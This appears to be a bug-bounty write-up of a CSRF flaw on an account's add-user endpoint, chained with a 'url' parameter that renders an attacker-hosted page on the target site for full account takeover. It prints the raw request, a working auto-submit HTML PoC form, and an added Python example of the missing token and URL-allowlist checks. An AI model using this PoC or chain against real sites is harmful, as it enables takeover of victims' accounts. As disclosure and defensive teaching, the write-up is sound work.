Cross-Site Request Forgery: Critical and Exploitable on the Infected Site?
Hello again.
In one private program on HackerOne I found a Cross-Site Request Forgery vulnerability, but not the usual kind.
I turned it into a critical CSRF by mixing it with HTTP parameter pollution.
Let's write up how it works. 🤔
This request adds another user to the account, which gives that user access to the victim's account:
POST /users/settings/ HTTP/1.1
Host: evilwite.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 239
Connection: close
Upgrade-Insecure-Requests: 1

ThisAction=AddUser&NextAction=Insert&new_user_email=attackeremail%40evil.com&first_name=mesbah&last_name=mesbah&phone=01032764848&csrf_token=PdsLuVDyQUbQZjbnl4R70oGTUIyKJfl7dHXW0j0jd4H7tAJR%2Fe%2F2P7%2B6akjtBH7thiGbmGhidK29eDguPn2dYg%3D%3D
Okay, what's the problem here? The csrf_token is accepted without any validation: the request succeeds with any value, and the user is added.
So it was an easy CSRF. What now? Create a CSRF PoC, of course:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://x.website.infected/settings/users" method="POST">
<input type="hidden" name="ThisAction" value="AddUser" />
<input type="hidden" name="NextAction" value="Insert" />
<input type="hidden" name="new_user_email" value="attackeremail@evil.com" />
<input type="hidden" name="first_name" value="mesbah" />
<input type="hidden" name="last_name" value="mesbah" />
<input type="hidden" name="phone" value="01032764848" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
But while searching through the proxy HTTP history, I accidentally found a parameter named url: whatever I put in it is printed in the response.
Of course I tested for Cross-Site Scripting, but it didn't work.
It took me a few minutes of thinking.
I found that I could put another website in this parameter. An example of this parameter:
https://x.website.infected/public/repositry?url=https://y.website.infected/
Okay, please think with me now.
I got a free hosting site and uploaded a file to it.
Now we change the parameter from the original website to my 000webhost website:
https://x.website.infected/public/repositry?url=http://5000mesbah.000webhost.com/csrf.html
Oh my God, it worked: the page was rendered by the website itself.
Why is that useful?
Step 2: I added JS code with a window.onload function to submit the request automatically.
Now it is a full account takeover,
performed by the infected site itself, not by the attacker's site.
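As an added example (my own code, not from the write-up or the program's application), here is what the two missing server-side checks look like: the csrf_token is compared against the one bound to the session, and the url parameter is accepted only for an assumed allowlist of hosts, so neither the PoC form nor the 000webhost page would get through. Function names and the allowlist are assumptions for the example.

```python
import hmac
from urllib.parse import urlsplit

# Assumed allowlist: the only host the ?url= parameter was meant to load.
ALLOWED_URL_HOSTS = {"y.website.infected"}


def csrf_token_valid(session_token, submitted_token):
    """True only when the submitted token matches the token bound to the session.
    Missing tokens are rejected; the comparison is constant-time."""
    if not session_token or not submitted_token:
        return False
    return hmac.compare_digest(session_token, submitted_token)


def url_param_allowed(url):
    """True only for https URLs whose host is exactly on the allowlist.
    hostname strips userinfo and port, so 'https://y.website.infected@evil.com'
    resolves to 'evil.com', and scheme-relative or http URLs are rejected."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme != "https":
        return False
    return parts.hostname in ALLOWED_URL_HOSTS


def handle_add_user(form, session_csrf):
    """Server-side decision for the AddUser request shown above."""
    if not csrf_token_valid(session_csrf, form.get("csrf_token")):
        return "rejected: csrf token invalid"
    if form.get("ThisAction") != "AddUser" or form.get("NextAction") != "Insert":
        return "rejected: unknown action"
    return "added " + form["new_user_email"]


if __name__ == "__main__":
    # Constructed sample: the PoC form body, which carries no csrf_token at all.
    poc_form = {"ThisAction": "AddUser", "NextAction": "Insert",
                "new_user_email": "attackeremail@evil.com",
                "first_name": "mesbah", "last_name": "mesbah", "phone": "01032764848"}
    print(handle_add_user(poc_form, "session-token-example"))
    print(url_param_allowed("http://5000mesbah.000webhost.com/csrf.html"))
```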
🤩🤩🤩🤩
Even better.
And wait for a new write-up from me.
Vulnerability reported.
Vulnerability triaged.
Vulnerability: the site has not paid yet. 😞😞😞😞
Goodbye.
❤